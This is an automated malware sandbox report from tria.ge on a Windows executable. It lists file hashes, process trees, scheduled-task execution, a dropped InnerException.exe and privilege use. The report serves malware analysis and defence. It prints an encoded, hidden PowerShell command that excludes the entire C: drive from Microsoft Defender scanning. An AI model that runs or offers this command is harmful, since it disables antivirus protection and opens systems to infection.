Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
31s -
platform
windows7_x64 -
resource
win7-20230703-en -
resource tags
arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system -
submitted
10/07/2023, 16:52
Static task
static1
Behavioral task
behavioral1
Sample
b3d19d65687560f5c206d0338b7d6601.exe
Resource
win7-20230703-en
Behavioral task
behavioral2
Sample
b3d19d65687560f5c206d0338b7d6601.exe
Resource
win10v2004-20230703-en
General
-
Target
b3d19d65687560f5c206d0338b7d6601.exe
-
Size
1.8MB
-
MD5
b3d19d65687560f5c206d0338b7d6601
-
SHA1
7dc6e5681c33800c6543ecb148d4718e33138ee9
-
SHA256
05c4f71a5caa0ed6809fdfa57b44836f5ee6408d73f6b97cd9a751b696091101
-
SHA512
a08abdf2d73de01eabb72d9af096c3f6159861d376f4790837fb6e95ef50d81455279ce4e04cc39ff6d75a20d769c12123f958971e492fb3197d85120b36e6ee
-
SSDEEP
24576:osFKs/vvt1MSC/GoWvyMcUH81mVjIZ/WimspSM8rta7yLp08TM8nch2Cy7v4P+7M:osFKGbNoy9x0VpFm1ZE7yFsC9CiFb6h
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2708 InnerException.exe -
Loads dropped DLL 1 IoCs
pid Process 2052 taskeng.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 468 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2104 b3d19d65687560f5c206d0338b7d6601.exe Token: SeDebugPrivilege 2104 b3d19d65687560f5c206d0338b7d6601.exe Token: SeDebugPrivilege 468 powershell.exe Token: SeDebugPrivilege 2708 InnerException.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1752 wrote to memory of 468 1752 taskeng.exe 31 PID 1752 wrote to memory of 468 1752 taskeng.exe 31 PID 1752 wrote to memory of 468 1752 taskeng.exe 31 PID 2052 wrote to memory of 2708 2052 taskeng.exe 34 PID 2052 wrote to memory of 2708 2052 taskeng.exe 34 PID 2052 wrote to memory of 2708 2052 taskeng.exe 34 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b3d19d65687560f5c206d0338b7d6601.exe"C:\Users\Admin\AppData\Local\Temp\b3d19d65687560f5c206d0338b7d6601.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
C:\Windows\system32\taskeng.exetaskeng.exe {42B4C076-E55D-48D0-9622-381D6487A65F} S-1-5-21-264077997-199365141-898621884-1000:KOSNGVQI\Admin:S4U:1⤵
- Suspicious use of WriteProcessMemory
PID:1752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:468
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {7CF32B91-A7B7-409F-AC97-2ADDCFF7D9C8} S-1-5-21-264077997-199365141-898621884-1000:KOSNGVQI\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Users\Admin\AppData\Roaming\Item1\InnerException.exeC:\Users\Admin\AppData\Roaming\Item1\InnerException.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.8MB
MD5b3d19d65687560f5c206d0338b7d6601
SHA17dc6e5681c33800c6543ecb148d4718e33138ee9
SHA25605c4f71a5caa0ed6809fdfa57b44836f5ee6408d73f6b97cd9a751b696091101
SHA512a08abdf2d73de01eabb72d9af096c3f6159861d376f4790837fb6e95ef50d81455279ce4e04cc39ff6d75a20d769c12123f958971e492fb3197d85120b36e6ee
-
Filesize
1.8MB
MD5b3d19d65687560f5c206d0338b7d6601
SHA17dc6e5681c33800c6543ecb148d4718e33138ee9
SHA25605c4f71a5caa0ed6809fdfa57b44836f5ee6408d73f6b97cd9a751b696091101
SHA512a08abdf2d73de01eabb72d9af096c3f6159861d376f4790837fb6e95ef50d81455279ce4e04cc39ff6d75a20d769c12123f958971e492fb3197d85120b36e6ee
-
Filesize
1.8MB
MD5b3d19d65687560f5c206d0338b7d6601
SHA17dc6e5681c33800c6543ecb148d4718e33138ee9
SHA25605c4f71a5caa0ed6809fdfa57b44836f5ee6408d73f6b97cd9a751b696091101
SHA512a08abdf2d73de01eabb72d9af096c3f6159861d376f4790837fb6e95ef50d81455279ce4e04cc39ff6d75a20d769c12123f958971e492fb3197d85120b36e6ee